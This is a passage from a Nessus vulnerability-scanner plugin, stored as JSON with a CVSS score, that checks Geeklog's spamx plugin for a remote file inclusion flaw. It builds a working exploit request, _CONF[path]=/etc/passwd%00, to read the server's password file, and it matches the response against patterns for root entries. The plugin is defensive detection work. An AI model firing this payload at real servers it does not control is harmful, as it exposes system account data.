is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"geeklog_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/geeklog\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, embedded: 0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/geeklog\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches))\n{\n dir = matches[2];\n\n # nb: some installs move files from public_html up a directory.\n foreach subdir (make_list(\"/..\", \"\"))\n {\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n w = http_send_recv3(method:\"GET\",\n item:string(\n dir, subdir, \"/plugins/spamx/BlackList.Examine.class.php?\",\n \"_CONF[path]=\", file\n ), \n port:port\n );\n if (isnull(w)) exit(1, \"the web server did not answer\");\n res = w[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0plugins/spamx/.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n if (egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n report = string(\n \"\\n\",\n \"Here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}]}
